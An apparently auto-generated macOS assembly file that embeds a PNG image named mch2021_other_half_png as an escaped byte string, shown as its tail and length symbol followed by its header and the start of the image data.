GN.\255J\207(\b\r\362\236\203-\030a\n\017\241\214\234}T\305e\342\003\252\350\357]\021\232\027@U\357\fe\310\212\251c\002\025\225\243d.\366`O\212=f\276,\037\336\337\202\325\351\000\225\301\213\360?\331\032h\322\242)\221!\260v,\234\346t\251\352\321\027\236\347\271=R\2433\255Xj\314uRF\3163-\024\243\313\\a\230\323\324u\270\341e**\227\203\031\201\321\241\rT\356\302(\371`N\223e\3212\254D\265\003\343\355\353h*w\037x\335U\222l\303\002\211-\2177\355\201'\367_\007\262\002\241d\207\242\005\310N\355S\207\b\363\351\355Y\320\177\267swI9\226\356-\316\212\ru&>\335p\006~\347\336\246B\331\224\313*\370|\252\216\264\313\307\232\274Xb\322 \272\221\245\036\301\204\034\213\276\373\314\033\212\226\325yXz\365n^b2\203,,7\001s\200\211\003\366\375,\256\207\270\303\262\377G\001\256\354l\r\026\034\322\343\206\370f\373\003G\377\260\270\235u\350\007\000|\032xjBs\307\272S\360\004\360\257?\302\302\006\016\2660\254\314\251\305r\003\225\242b'\005\253y-v\336xb\214\342\345w?\317\212\312\3453\254x\037\276\223M\300N\006Q\000\n]\355r!\317i\212\033`2\3008\276\317\331UV\237:\206\3747\226Q\fBo\t\326\315\036~\b\026\264_6a\026i|5h\024\007\236\332#cJfd\231\323g\325\361\207\271\335\304n]%\261\244\265+O\240{\r\336\361\013\000\307\223X\202\276y\271_\276\317j\005\206JS\322\326)\377\002\005R\274Vm;dT+/p\206\257e\237\304\026T\225\273\310\035\224\361\376\204z\272\351 \356\b\223\017)<D5\312\272\216>8\2170\251>\203X\356\307n\276\016D\262H\363\no|\203\344\331P\364\356U\365Ty\r\272l$OrY\005\313\177\207q3%\274D\361b\\\371Tw\003\001\033K\300\f}\303\001\345\000\260gw\246\030R\344.\266\n\347\020\024+,\024{\342\247\205\327\233\262\200\302o\215\250}9M\255MK8&\215\t\001!V\013\300\330Cv\n9\267Z\334\322\006+\346\305\372\244\265sW\245Wy\264 \021LJ\260\361\214\234\245\034\375\337!\313\317\244\"\344=\027Y'V@E\355\277e\307\362\320A\275\310\035Q\210\371/\025mm\200Bm&\021(\374\f\033\332\360\227j\t-sj\303\244+\252\301E\200\311&\240\237\030\204\3706\254c\264\212yp\264[\005=eH\013\250\247\\\371\324&\320\370~\027\037\016\3332Z\003o5\202Fe\300\241\032\205;\256\004[\372\000`\315\3022\212T\355Y\214\315-\210\360\332c\302\032\274\242\223,/\002\230\203\017PS\337\265\200F\352\"\222\347\201\300\357j\300\022\377\255\224\033\004b1\027\224@>\250\323ZX\n%N\t\214\215\246i\272k\220B`\021OP\265g1\255\300D\177E\201\355vf\247\324QE\325\234\246\220f\0071\324Ij\364.\246\036\002\367\372\013f\261\315\235\244`\266\370x\013\250\022\301\"wb\251\354\217\243\017\277\303r\bemJ\240L\253\261e\266O\363H\316L7\263\000\200\274\n\202\222\215$\237}5\216\364\\\037\006\227\201\212\376\256\223{\373\320\225\371\217\250#\t!\312\216yz\277\332k\2660\356\205\325\242\213\341:\337\242\360\224\2272\005d\322~\344+QT#\036;\032\bX,\242ojF\023\327\27605\204\332\002\231\2159MBoP\253\306\324\371\342\032^P\302cB#\307\340LQH+\300x\246\002\301\211|#4\247\tE\361\303\023\300j\b\314\270xQ9\337\262\020L\217\003\230\0360\352\303Q\232z\310\254c\307\031\352\311\017(\2559\255Xo\302N\230\317\n0\b\270\000w\320k\305#E\255\332v\002eYy\022L\325\237j<^\210uK\345\211\265\322\243\357\354~q\247\273\252\000d\016\352+1\264\261Q_$\031\235\365.\363`\325\245OV\366\2765\365\025\246p\303\276\032{\230l\003+Gy\316T\353\261\2376\370\345\366B\201\334\376 :\311s\353\2125h\325\0008\312\252\207\264--dI\215\351\246\256`\031|\036S\222\313g\327\225M\005<Q\303\261G[\356\032eE\036\200%\\*v\327\025\304N\222\323\224\217&\225}\314\207\005\373j\020\253\360\361\274\3309\205[Z\270\365\251a\261\345\206y\363p\301$\027\373t\0172{\221\251m\230\027\2531EL\2477}\241\216\235\320\266Dl9\354\321\342l\366\362\035\211Es\315\213\026M\347\370M\350f\033\r\230\352?eM\023\364\224!\246+\353\213\020\304:\274\345\006\030\177\002\270TH\232\351.2\005`\223\246\316\243o\"\312\331\214\211M\363\331\212\326\343\341h_\325+\230\027\033\fS\256\223LX\023-h\237HN\217e\315+~\371\202Ts\215\033~AcI\212\036%\331#\006k\257j\004\232CJR`\302K\\\203^\344n\013\262\bX\032\200\360\374\r\017\316\257\300\262\353\334`&o\307,\305\002J\031\327\315dK\303\003\275\305t\023\306\316\207dJ\242\365T\332\211\305\024\346\372xQ\240\330 \372\357\323M\t6\312\310\301B\0341a]\206f\226V\342@C\343\324#\2442\2540\246\344\304m\226\375w\277)\313\307\002\251bZ0\206\216\274wm\357M\250_\204\265A\372X\t\204\346\205\"/\246\306p\300\213=s=zd\031 \222\341\001=\0306\372o6P)\004H70\301\355\240\r\301\ro\273On\251\357\362\263\006*\274{\205\220__\237\337\243\252Cc\030\331\030\222l0\246\264\205\225\313\022k%b\213>\207\3248\327\222\f\200\305\227\222\3067\032\214\215:}\330\351*\206Z\273M\336\202\346\b]\277M\214\013\351#%\230o\205\275\334.7W\340\265\274\377Gu\260\005\315\027\254\373Ap\006\373\016\035\t\033\357\236z\027K\242}t\352\324\273\360\267C\247\330\277G\216\2170\367\001]\377\033\034!\0074>9\375\211~|\234\2713\006\260 \333\237\202O\207\313\265\022m\247\017\301w\235\202s\207\250D\033sg\f\3771\204\240\377\037<M\303#a\343\n\033\303\360?\355#\376\313\313\376\321\365T\372\017\213\375\215\350\0074\206\307\202O\033\345\327\207^\301o\2053\303cp1{6\036\216iIW\023!\304\230\306\336\317\237\022V\330\260\344\271\242\347`\324\326>\267\376\332k\277\221\351{\356\271\202\0248=\2139l\216\bX\330\360\032\223\311t\215v`\272V\273\025\326\225\376\230\231\314\243t\262p\263W\366\006\237~\255\311D|\250\262Zi\233\002\337\325\210O\241\322O\2370\217\325\343IFbL\023]\341\356\215X\217T\347\342\211\177Ef\254\272\302\003\361\272\371\242\327\374/Z\342_\364\344\315\314n\371\023]\017@o\201\034R\344n\241,\037\0048\337\204\354\204\267\377\310\000\n[\017i\211\177KB6\311\271\320\332S\314\266\361\030\032K\220\266\r\274\224\214HB\265\367\320\250\226:)X\276<u2\n\307\324\006\320lw\365kE\356\f\235\244\356\223\233\313x\352d\202\226:\211\035&\006\324\221O\316E\244N\252\352{a\311\247$\352^\337)\371f03V\025c\245T_\036Y\307.\r&Zbbb&K>]\321\334\202\0034\370\275Q\314\200\367\315\026y\313|\340\207\310p\005\024%\225\373\344\226\256j4<\005c2\021\347\267)\021\311\247\227\215\351\273\311%U\305\211\254\r\322c\256\274\331k\213\334\356\265\377 \3506\220m\304\255\207nO1\210\272\220\364\335$\320hSW\370\365*|\245\350\006\030\341E\356\274\225\373\273\002e\0134\217Ui\222\030\222\276\213}\244\204\360\364\335,\247\t-z\332\3074\017\371]x\364Z\346\372\031\314\313\027M\206\331~\366r\267b\002tVf\254\236\000\035\023L\200Nje\t\320^lt\325\247\216\372+\t\375\367D\201x\243\262\264\376\216N\264\375\314[\327\320p\017\311oC\0024\225\310*#\237\232\356\224\004\245\000S\310u;s\225\344q\372\244\222\027x\237\246\004\033\350\355\324(\n\016\236\345\232m\nK!wgO\002\267\2521\205\274\205\001\225\255\330}\002\213\334\355\342E\036\026\374\224\271\254\274\205\002+\314.\210X\257=\327 \211\001UT\004@\032w\007wC\215)~#\267<\b)\005\215\324\006\351\227\312;\277\375m^\260L3y\210n\032T\273I\033M\347U\357\244\265\323'K\302\207\367\273w>\023\334\203\267\223\b\306\"wS\231\236Y\275\342\351\216\203qz\022>\301O_\212\206ex\275\217\370^fh\020\022\262\234\324\006\t\324\201\261\007\022yoVW\226{\3622\006\260\224X\031\203\\,\261\363\357\276I\203\302\250\214\301\3367x\031\203]\bbVPM\316]\314c\205\335c\251\214\2015:\232\312\030\350J\223!\216\206\312\004O\325z\263\346\201\322\264\222\325\216\3014\013\372I\231M\241x\002\365N\2529\303\013A\370\256\250\003\211\0055T\227/L\325\355j\227\367\242\323\214V|\024\272;\274q\270\272\206n\257\346\245\313\003z\361/\033*MB\025C\2543\007\365T0r\257Q!\007_-\025\202\020c\261\271V\243\253 M\020\363\334\215u\300\227r2\204\220\t\264\200f\333\177\235^J\003k\311\333@\355\254\211P;sZ\3447\313\270\313o#\251\235\330\006i\351\b\026\213i\313\217/\253\347\256'*\f\307\225\246\002\243\246O\343[\330\235\326]\236\225($;\033M\250\311_R/r\313\203\000*u\310\312\002\275\211\027\225\243\340\002\001\033,\177\0038\352\234\265X\214\244(%Bq_\300\203S{\230\303\bC\n2>Q\307\272*\"<B9\330M\203\345\231,\0355\024#Io\3740hh\020Lh\013y\027\027\000\353\362d\013\3519\301l5\026j\317b\2412\226\260pjlXK\336-5\2562'\273\n\364\271\216\266E\013\301r.d\213\211\303\372\376\350\217\274\314\374\001\341[\376\300\017\235\254\031\236\261\217Tz\243\324\310:\257a\003\002\273\tm5\270\205X\367cV\244\321\026b\037\264\232A\263\305\242r\210N\315ni\303\215\266^\f\300_\264\301]^%\025\013QQ\232\362\254\025\304\341+>\376'\262|\240\232\247\327?\022i\335R\336\376y\215V\332V\267+\000}\236t\320\252?\305B:\371Q\026\023Y\f\277\213\365\270\225\375\035\3337\337\024n\037\024D\313m\254\217\224\215&\030\373\317x~}E=[\254\225\024\n\004\310\227\214\r\236XI\241h^_^+)T\021\037\325\257\016DEX\267\250M\2073A\214\323z|\013\311\tD\237\030\305J\n\035|\245\341\036\023\262\362%m\240|>E5W\275\327\033k\036\tT_\026\213\312\361\0264ZQ\246SL{\307\nf;\251\352\035+\312\004b\314\213E\231\306\267\211\254(Se\233B\266\232I\212\334\345\034x\211\251\337\261Z\343.\314\263\360!}b5\026\271[B\352\237\251D\240\262V\227\325\276\026y\337a\277|\217\331XT\016_\334\275c\352\263!e\255\032\327\027;.\222?\237\n\351\3756\264\254U\363\235#j\357\265d\002n\221\027ke\255\"\213\334\211%Z\216\t\267\016\262\352\255\215i\024S\301\312Z\035~\205\n\203\225)\201\273)\226\242\253z\262\302`\310b\242\265\230\226\030\353\214\3657\326\220\223\355\024\225\rD\027V\333\177M\020Xa\260\207\276\343\247\242rp\261\260b\217\334\336\252\005\005\360Z\362v\273`\214\373\301^6\215\237\251\352V<\353\220<i\016^\030\354\361;\364\302`TZm\017\313\320\331W\352\227\233\227\207Y\204v\261f\t\232\033\302\256\227V\273\262\203\227V\373\327\227\244\306b\301b^\b\020J\331\363\301\270\332\263n\271\rQK\313\341`w\b\264R\013\026\016=\270\240\375\371\356\327\037\255zbL=\353v\025'c\217Q\324\311\261\264Zg\013\205\357\264<\335 Sq\272\026\255\352\035\367\020\t\206\266\030\350$7\223\365\227\237r\244k\305\351>\257\2425\3042\032\201\277\317l\221\367t\360\242r^D-\363\313\252u$7u\200\271\022\203\305\351jX\216\320Y\365\352\023d\036\000\034Z\347A\227\032+Nw\206\027\247\023\242m\245\362\236c\373\251a\263w\335<\214l\375E\227\322\232\241\303\310Q\346$\217\326-L\256\307\260\351\016yJ|5\331B\235\344JqQy\277\243-\374\207z'\361X\001\263\177\330\032\254?(\246\347\346jU\370\252\210R\347\243TY\315n\263y\345\203]\035\355X\336\257a9\266\240Y'\277\\\375\214\f'z0\374\002\001o'\013\363\0205\343\231\241\350\ry_w\274\352t>zE\275\230\231@\322\331!\260>M\312\211\007+G`\251\034\256\257\224\233\257\267\304\204x\254\256\353U\007\3141\306\002\211\323Y\201\304K>\311\301\n$\376\217\342\202\344hj\203\364\323\352_\340Z\276\337j3\001\377\002%\306\013(\256\033N\3404e\034\224\267\347\363\305-\364\032\204\270\256S\351%&w\261(<\251\226JL\212\001%\360\tn\266\316\256'\345\206\310\022\223\0048\370+\006\211UT\267\254\250\346\224z\025KL\356\320JLRL\360&\331\017\263\364\340(,\n\201\332 \255\243\276E\000\371H b\221\316\371\334\241\275q,\242\250\\\306\277\362\"\235\t<\031=QOy\314G\343\331\247T\344N\276'\332f\360\251Y\260x\022v\222\322\034m\026s\0215\007eE:w\276\020,\322\t\354l\036.\221M7PUS\0236P2\337'\373o\265X~\303dtR`\017\265A\252NBsq\177\230\020\215\017(/\362\034\336m\334\222\224\220\355\310f\266\334\fP\312\272\232\016\372e\377:Kd\231S\354\333fg\022I\340eN\001[\376\n\331\337\243\304\360\001\213\331I\242\336\340\2257\203\214\355WGfQ\241X3\213\372\230\302\243L\312\260S\037\006}\224E\372\3331\360\353\275\235\314$7U+\361\206D\"\205Xm\033\013\305v\375\340\233\f\325\033\203\216\354\026\0241\033\311\257\033m\266\026I\215\353\227}o\\=\353)\2065S\002<05?I\307\212,\352\003+n\231\340Z\213VjW\353xS(\267\347PP\324\345\210\210\005\252\266} \227i\312\306\252w\t\230\371\013/=uM}\375\022\256\354E\207\204mY\315QX\342\232\225\332\2658\245F\253\275O\035\371\265\344\231;7%\317\223\036\024\rf\255\324.\314\300xH\033\244(\036\351\364MjZ\221\332tZ\275\374xDM\271\234\246\377\261\223\373\330\264\022o\032\205\037\0322\301c,!\036+;R\025\203\225\247\354\244(\24236\005\327\b\026VZ\273\326\2212i\344\021\240\177\275\334sY\274!V\214\365\333\\\215e\023\261\035@\352\222x-*(F\020cY\271\347\004\356d\323\275\254\tX\226\226\2009\372-\215\365\221ud\01630\310\234\356\030\032\365m@=7\317\360I\276\351\327\204\251_X\3569\207\315\000\021\270d\277\354?J\214\217E\333\305Q\301l\200\235\003\370\236[\233\024\336\270\217\334uv\020G\351i<\004\323\030{\004O\243\032\342\036gn-\3516KZ\333\312Bu\033\354$u\204\355\235*\334!0\237\213<\222;<\270L\250\307\202\331\254\3028E`\266vu\000\205\b\312o&'\205VTnb\233\250{\2102(j\211\227\034ON\344\341y\306\350-\\\221Z\223\\\t\376\255\013D\224\034G\367\375\310\235\304h\262\321ex\261\004\337\306\262\210*|\n\310\244\216\003\270\272v\361\242\355e^\331\377S\315\3153\253Y\336\"\220\223|*s~T\244\276\271\377q\275\rR\202Gj\364h1\242\301NRX`b)\305\327\272|R\025\n\234\360\242\3556V\344\256\207\371\356\363x\321\366\306U\223\025m/\364\313\035z\321v@\337M\371\035\314\020\217\215\230\237\344E\345\230\236\020\177l\377\223-h\020`\230\017~mV#\306z\210\232I\2119\257\233\336\3275[\020|\236\254*\311\363\263Ww`\301\211l\201\232M2\217\025\026\271\243\307\246\375\212U\341s\247['+{\277\346'<\246\326\244\007\335\302[.\2342e\n\250\003g(\376\222\000\334L\264>\242\234A\022\027\233\027\336\267\374\006l\301\233\027L*\305}%p\233\212&\024Y\374o1\257\270PU2\203\207r\307\300.\263\3641O-\314\304\225\037:\253\362bu\343]P\235\244\"w\024\365;e\212I\013\013\016\344{Ysn\220\321\330z\201E\260\226r\007Q\327\343\210r\b\244`7\013\320\355\362\202j\366\3046\020/h\225\322U\313tPy\213\023\270\211'\353\306\242\031\253\212\026i\376(\216\376\321\261\224e\210\243&\254\250\221\210+\037\255(@\216!\022\375\026\257\241\352\035\357#\205\261\325\363\343\313*\226\360\220j\200y\373\320\231\\\025\354\036\216A~\031T)\333h\252\235&\260\346\025;_\227|s7P\377f\026\023\211J=\374t-zX\324\202\344\220\276\240\360\246Ht\262\343\031C\345o\301\262\201\205p4>3\000\000\005\340IDAT\245\177V\325\337\307\261(\352\220\242r1\rrC\005\306I\004\222\304<C\373\017\230\213\223\330;\374D\210\301\204\265\377h|\313\307\332\177\020\211\351\032\372\357\371F0\216\302\256y\204\354Bx\373\217\305@\316$\331\020\245\203\252:J\367\207\025\225\333${\017\034\306@\216\n\304\353\364m\251\365\255M\371\375\252:\214\016\2300S\262XC\211\020\324@\245q\356Z\344\220\211\232)\025\236\317\243\207c\254:\201\177\263\201J0\243\f\235\0013\347\300K\365F\031\270\330B*v^\311[\320`&l\222\261\005M[~\330f,\240\366\301\260[$\337\"\213=\017h\315\316\346z\272\336\202\206\366\266\235\265\240\t\177\305\214\300\036\032\347\276\370\264G\033\314\333\240\016\234\201\321\253\237\355\351\356\356\3013gz\276\370\342\\O\317\347\237}\016\347>\205\343/\3161\007\307HO\304\370\354/\237\301\370\374\363\317\376\202\237\340\303\347t\232y\240\306{\331Sa\364hGA\032\276\370\202\037}\375=M\0034.\\\030\320\307\020w\020\r\302\b\236\035\350\357\357\037\244S\027\360\342\213\347/\262\373`\360\354\244\201\210q\351\342y\034\374Z\370@\377\016\360t\245!\376\324\376\376\201\320\243\020\202LSh\300\032\234\242\215\251\254\025\327\312\302R\257\274E?;\305f\236G\346\373\322Vl\305U'\225\300\271T\024\267\3129\326\212\253>uJ\350\310\306\032\347\344\020\362\315\276vJ&l\352\202\\<\277\225\025N\374\006{*\f<\270\026\017\256\323n\315Q\024\221\035M\262I\n\007\361~,\236\312@\203\016F`\027\277\331\311\233\231\361\202\004KZ\225@E\037of\026\b\255\245\211\200Ekf\346\271\021\275B\274\351\n\353\025\306\241\256-\270\213#\272\f\205\357\342\270\0058\026\203f\373\247\007(m\206\233p5>\250\265\203\003Br\265vpB<\342\205\336\023\027\324\341\256p>\b\300\306\243\265\203#\007t\256f\n\350[\335\247Gc\351\024F\266\203\373\346\002\255\343\037\021\030\267E\223$\203\245< \021\030a\345\3428!\003KU\317\307\002\252[\332\345}\350\000w\006\033\352\001\342\032\246\206z\347\302$\tk\250\267[o\250\247\025\210;\256\016\257\244\274\025!hA\233\264\323\325\342\240$\301\240\233\324-ZK\302\361\017n\241\220\316\231\242\200D\265\274r\370X\240\f[N\343\r\376\005\002U\204/\320H\301\262\304I\n\211\022}\006\223\313\353\\Y\t\274\307P\361\364\265s\327oX5\203\177\371JV_\036\035_\231\006Y\314zri\212O=H\003Vp\326\244\305\273PFt|\\\334\352\t\326\324\021\376\305NR\225^\026P\262\007s\206\254\367mZwk\f\026\335\013\326nb\205\235\311\314\2537uL\244\275\301\242z%\237\243|6w;\332\321\302\320\303j\017\307\r\252W\212\013\034\351zSG1F\2073\230\303\244\034\303\242\302\254\343\037\266\305\254\340\031\333\2507\275L\022\230\307\311D\3159\332\211\345\335\375\225\267D\003`\302\370\204t\f\334J\327q>\351M\025m\237\0045\246b\251\261\270Vr\377\363K<\000\0074&\233\235\254\337f\f\317${~\312\257\250N\212T\225\030\211\007a\302\252\237\342E\217\265\306\242\360~\237\0268B\236C\t9Z\224<6\026\235\177\370\340\217tD\035\033\354\221\023\354\252\303\334\214\263\310AT\342\321\032\213\276\363\366\367\223\203y\030d\306\356W\373\bQ\307\346\235g\235\\=\2236\026\305\262\321\337\321v\261\320\212Qk\207\253\371\267\334\216Qu\363\3110\270\221\201Y\324\342s(N\017#p\341\253\263\322\033y\336\032\357#\305\321\377\311t\036\266\346s\300\f\"\223\314\t\211\363\243>R\367\262\326\254\030%\3779iW\021Qt\371\312\261\026y\3171d4[\331\032<\n\364Q\364\f\025\342F\255\016+]\203\232\215M\033\261s,\343 4\005\330\3346QS\232\266\032\213\312\365\262)\361\325\225\2605\270F\tu\346[\254\266\233\007\325n\203V7\376HJ\321dZ]S\207\274\207m\271\001\275=0\3054b\3474\334\244L/~\204Bo\253\223\222\362\313\270\353)\032\315p\2404y<\214\351\006{\246\341x\002;\3368\263\341\245\342.\316\026&i\017\334M\366\243\260\366\300\276\210\304\265\370\355\362\301\n\246\326\2066X\356fq;\263\374(A\342+\316\251\227\2332\302\365\357\324\352\177\336\2411\335\220b\360\345\030\013\373H\320 \030\035\332@\005\033,\243\377\235\205\004a\322U\nh\325\277a\r\226sc'\265,\300\204a\243y\233\300\tD\315\226\331f\374\251\330\222\263k\330\360\002\203\326-\345@^^\212\346$7\320'\225\240V\235Q\201\016\271h\253\241\323\007\347rf@\232\2033\t\370Y-\353\245Fs\fh\325\217J\215\313\256\021\n\352t\333G\264%\330\242\272[\035'\353\026\317i\232\312W|N\247\274/\200\316\363\372?\006\267\200\301\272\245\274\200\031\217A\227\241F_9JYj\362\235\023E\021Sf\243\331\003f\020\305\023\365\303@\363\245\344Y6{\033\260\032\337\262:\237\307!\271\023\343S\3050\353\026\262\b\023\371\324Y\233\364\207\331\212\217\017\2606\351\360vA\265\t\357\231\000B\343U\262(\307\362,A\324q\263R\220>A\214\307\034\331\326\375{[\274\313'\261\017Z\201\305\b\314\004lgm\322=gA\367\344m\322\177\036\300\210vj4\217m\322Km6\033\326\227\377_\035\n\004YW&\246\230\000\000\000\000IEND\256B`\202" .globl _mch2021_other_half_png_len ; @mch2021_other_half_png_len .p2align 3 _mch2021_other_half_png_len: .quad 39410 ; 0x99f2 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__const .globl _mch2021_other_half_png ## @mch2021_other_half_png .p2align 4 _mch2021_other_half_png: .ascii "\211PNG\r\n\032\n\000\000\000\rIHDR\000\000\000\240\000\000\000\360\b\003\000\000\000\260\237\237\350\000\000P\224zTXtRaw profile type exif\000\000x\332\255\235i\262\355\270\255\245\377k\024\036\202\330I\344p\330)\242fP\303\257\357\343\276N7\357E=WD9\335\244o\236\263\267D\002\013k\201\000x\355\377\375\277\276\353o\177\373[x\337\026\257\\\336\372\264\347\271\371Wn\271\305\316\337\324\373\037\377\332\177\376\367\367g\341\316\347\277\317\277z\377\363\317\302\035\256\177\376\007\177\375]\344\177\023\377\233~\177\370\346?\3774\375\371\363\277\377\374\363\327\377\362A\377\315?\b\345\337~!\375\3655\361\237\277\370\375\373\023\305;\376\333\023\345r\377\363\277\352?\376\363}\253~\337\376\275]\317\017\313\360\374^\352\367\025\327\337?\206\037\034|P:\277\366\360\327\313\177\n\177\377\236\277\032\177\325\273\3373\344{\335\363\036\3745C\0131\244\373\0139\254+\364\360\205\035\026\377;\303\344\031s\334\361\345\177c\2341\235?\253\351\215-\316t\247\220\262\177\205/\276\251\245\225j\212i\306\235R\312W\212\177=K8\337\333\316\367\315P\371\346\025\370\321\030\370\260\300\257\374_\377\272\376\247\037\370O\376\372\276y\263F!\360\366\341\217]\360\\1\272\017\301eL\3767?\306\206\204\357\317\276\225\263\300\177\377\353\257\177]\377\264\261\211\035,g\231+/\330\357\361\373\210Q\302?l+\035\003H\374\\\341\177\177\366\025\336\345\256\305c%\231\357.<LHl\301\375\204T\302\023\3567\3067\204\234be\203:O\036S\216\203\035\b\245\304\305C\306\234\322\303\336T\354\210\357\346w\336p~6\226\370\373s\\\205\375)\351I/{\323Rg\263r.\330\317\233+6\324K*\271\224\362\224\267\324\322J\277\236\364\344\247<\317\363>\372\\\177\323\233\337\362>\357\373\326\267\275\275\246\232k\251O}k\255\255\366\026[\302%K{\332\333jk\255w\276\263\347\253\227\316ow~\242\367\021G\032y\224\361\214w\324\321F\237\230\317\314\263\314g\276\263\3166\373\212+\255\274\312z\326\273\352j\253\357\2601\245k\347]\366\263\337]w\333\375\303\326\276\364\345\257|\317\367~\365k_\377k\327\302\037\267\375\367\277\376\037v-\374\331\265xv\312\237{\377\3325\376\364}\375\240\363\021A\234)\356\031;\026s`\307_w\000\203\216\356\331]C\316\321\235s\317\356\026\361\212\022y\310\342\336\254p\367+<la\336!\226/\374\265w\377\330\271\377x\337.\326\372\177\332\267\370\237\354\334\345\326\375\177\330\271x\355\364o\373\366\337\354\332\022\t\347\331\261\237\027\272\246w\302\373\370\270\020w\323i\331\326/\274\345^\317l\337^\367\230\254\320xAC\020n\247\372\365\267|\353\345\3633\337\373\254=G~\327\373\340\002i\3541[)/\bP.^\344+i\257\266\237\261\302\313\317~\265\260\355\005xk=\361~\267\000\226\205\265Uw\231:\351\340\273\352=\374\321w\247w\244V\257\274\236\357\251ljM=\3059c\337\375\t\374\356xs\357/\017\267\006K1|\302\326\326\227y\255\220\367\207\327\276_kq\215\257\336_n\327XOJw\353\357(%\205*\302\326\331[\332\243\315\365\206\267\367\247~\357\333\213o\366\262g9\207\352\203\b\005i\342\036~\302L\327\332\367d\221\326\030e\016\366\356\031\333\227_\261\256\375\334\3402/W\236^\366[Y\312\310\242`d-\345\3178\320\326\354\230\005\253\374\261k\354\353\340\365[\307(\261\204\260\237<0\003V\240\357o\027\377\031\333\031z\237o\333\t\353xW\312\353\376\356\314w\360r\263\357\035\306\305/\020#\214\0051g\026\247b\305\241\354\266vj\243\3241\037>\0040\373B[u>lK\272{\255\317\307\023\354\236\226k\207%\340\"}\225\321\277\372\224^\237\276\036\f\222\007Jq\365B\374\252Y\017\340\243\327H\265\217\365\335\354\270{\013\272\362Y\273\317T\312`\031\306\225\337\3017\365<\373\243O\343m\223\365\033<G\004O\313\234;a\3128\315\267\337\225\367\r\322\324\031Y\302\331Rj\033\003\b\235\317\332\027+9\336\304\177\336\360<s\257\256\323\247\021\000\246\366\003\217o\026\354\261\263*\241}\265\356\230\360\302\2017\026\360\346\273\023k_\236u=\335\237\346\307y\347U\366H\373n+\263\237\304\371\367=\226\016l\264X\006\366\300\316\362\210;\024w\202O\017_\345\205\336\366\344\357\372\356\306\202\016\202A\331\330;.1\362\274\327\213WN\302w\347WZ_\341\331{\361\b\230\347\032,k\234\245g\354\221\005\216#&\336\363\332\304\361\321r]\300H\030F?P\200\215\031\355\003\013k\007@\240/8\327d\245k\232\376X\033w\235\365{Zf\037\322\016\367W\347\225\361\366\207\025\371\326\267\330v\b\013\210\225\007\257]\353,+\003\004|F\031\330\315Z}b\0138\317\210\255l\000\216E\230\330m|s\271\336\357K\253w\f\367\306\224\342\312#/\376k\336\241\317o\002O{\277\203o[E+aQ\276\210\373\224\347\303\337\356\370\325\261\371\261\260\336\013h\336`\364\3407\356\231\352\241Ox\333\227r\303[\302\340w\027\237}\317\231r\035\005\277~\2405x\0310\360\201\355\245\315\027hY\027\020\226ym\300\031 \376\342\323A\245{n02,\236\346\313q\335\374H\031\225=\373\346\340\213c\250+\201\267\001/csv\372\370\274ka\314\255\217\311\232\001y\373\341sx>\r?\261\364c\214\316\232\224\257\225X\032o\237\372\033\260\321Q0%^,?\213Oa\t\363\345\257\340\255\373\367\313`3\216\0177\300V\371\241\247\311\331\360\007\276i\357\362\335\317[\307\363\214\261\f\017@z*8d\032\355I\327\000\360\330vP\357\356\223\360\363~\363c\037\362\232\254<\306\243\035~\031\260y0\246\\\303,\203\367\203\217OP\t<}b2p\304KW'\350\004\243\017x\017\337Kk\314\312>\020\005\237\326\t\004\017O\002\370\202p|\022\037\223q\270\225\353[\264%\367\251\247\017\2505\324<\213'aO\301\252\211\213V0\246d\336e\363\366`\024\377\b7\307\264\372\tB\330\364\376R#\320\256\215\321m\036\350\316l?\366\316c\361\215\215 \361\324\275\357\r\035\336\013\317\006\313Vz\313\256\337\214\240<\324\227\020\212\023\023H\"\370Hh\356\320\260\217@\372]\3150\3037`3\353\351\300\341W\352\356\001\314m\200r[\017\301\350\353\025\232\200\233\277\354t\237\262\213\232\001%\200\313\300\364V\236\374\202\302=\245%`\036\222\203\242\301\365*0\337\337\233\320#\364\342\r+\267\367\313c\227\225\366CD\006\334\"p\003\303\302C\201\324\035\333w\325g\033r4\210\231\301(\036\017\300/x/!\032\202=\001\n\336\352\203t\023\215\247\200\375\360A\351\325+\211!\000E\271gy.6\017\b!&4\342s\373\002\026\302k}\230)\376\317O\325\210\257\275\230jz*\001`\004\240\003\332Q\210h\270\355\215( t\342&\327\212m\020\377A\260R~\200\206zac\026Dc\205\306\216\356\210[\315\357\215\017\301%\367@\030\307\373\331\310\027\367z\371\f>\177=Wm\307\242\023\256;\260\247\257\227O\237(\255?\317\302\353\343\215\001\217w\016\366\212\340DX\236\241\023\375\021q\3540l\351\333`\204O\324\0015\224\307\227X\034\f\220\367!8\tr\365\315#d\210Tjw\316\023\356\206\363\021&\007\333Uad>@G\347`\032\243>\327x|2\202;\250\312\342<\253\343\342\320\nl\206\355\353w\003\224\203\350\237]\353\262\260uP%\360s\204\315\257w\tG{\363\276\n\313\220\330k^?l\202\021\001\211\250\321:!\262\303n 5\300\345\207\337\301\275\360\213\361$\314\007xD\013\206\375A\017\260\261\n\326\\\r\227\371np\022'\205TA\320\330\251\2338^zL\003stO\302\374\370\264%\n4\254\260=\276V\216\005\036\n\313\346k\346\272J\355\271\215\314g\363\250\013\223\"2>\235H\370\301\336\300\247\027&C\270\3044\352\212\035I9\001\rH\025\321\034\344\032\t\377\355\360C\200\rd\341\241\371\271Z\b\275\037\230\200\205\021C38\364\021u;\177\264\370p\276\215g\225\377\354\321\361\2624@\t\270d\nXA\231Wy%\177S\225\363\354'\020\370AV\002=XQ\211X\2174h|o\207i\002\274\330\022\334sc\034\031$\232\230\304\r4\201w\353b\353t6H\0268Y\340.\004\302\005Z7\034\005\376\001\276\347\215\321\301\210\347\373\200\030\220\347\000\035`O\t\221\343\346\245;\0246\275\027\024\276Ah\032\313\013uX\363\203&I\255\364+\036\005\240\n\360\207\b\f\270,\373Y\306\221\364\020\205\207~\r}\237o\236!]\025B<\026\234u5\336t\025\231\007\361\207\r\345\2431\274\360\036\326\214\267\005\367\332U\300\f6[\220\t%0\357\220|\262\357\302B\300\246\265x\271\217\035\202s\300\263g?\304\206w\300\031&.Bp\035o\037\211\007\376\364I<\035^\267`K\033(\310p\253\353\3050\025's\0313\bp\332+\237\302n<,#\177\327\370c\000\243\361k\231p9+p\036\200\220c\257{\022\332F\336\3752\322\020\340sd%yW\361\003H\252\017\217=y\223\005\267\305\000q\276\342*\263\362\235=J\241\335\354\376\032D\233\027\267\205\340]\350\334\250\002\234\013g\305X\200\330\375\300@o\354\356&\202\364]\372\320\276\020\032s\004(P$\332\017\326\264\372\r\001\361\204\306\373\312\325\"\334\000\203\217\211\030\304\303a{\346(`\252\375\221m\261\b\371\004Qb\005\257B\314\211\001\244\302j\223y\203\321XQ\326\340\273R\006\313